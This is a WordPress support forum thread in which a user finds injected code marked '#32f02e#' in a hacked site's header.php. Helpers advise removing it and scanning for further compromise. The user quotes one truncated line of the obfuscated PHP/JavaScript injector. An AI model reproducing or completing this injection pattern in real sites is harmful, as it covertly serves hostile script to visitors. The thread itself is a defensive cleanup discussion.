Had you been working on something? I am an old, half-blind mechanic just guessing here, but that #32f02e# looks to me like a color number that should not have the extra # at the end where I think it might be messing something else up (such as possibly inside functions.php).
I see it in the source code. How do I remove it? Below is what I see in the source code.
[Please do not post malicious or suspected malicious code here]
Thank you.
See the links posted above – there is no quick/easy fix for hacked sites.
I switched to Theme 2012 and the line disappeared. What I want to know is that when you go to page source are the lines of numbers part of wordpress script? It is line 63. Looks like it changed with the theme, the line number.
Thank you.
I found the code in header.php file. Looks like the one pasted below. Only part of it. Is this wordpress script? I have only included one line for security reasons.
#32f02e#
if(empty($pasl)) {$pasl = “<script type=\”text/javascript\” language=\”javascript\” >sp=\”s\”+\”p\”+\”li\”+\”t\”;w=window;z=\”dy\”;d=document;aq=\”0x\”;bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1)
#/32f02e#
?>
</head>
Nothing like that is in that area of Twenty Twelve’s default header file. If I were you, I would remove that questionable code and carefully go through the links WPyogi posted to check for any additional hacking.
Is there software that scans a WordPress site for malicious software?
Thanks.
There are some plugins (search the plugins page) – but they will not replace going through all of the links above – if you don’t get it cleaned up, it will likely reoccur.
Where did the theme you are using come from?
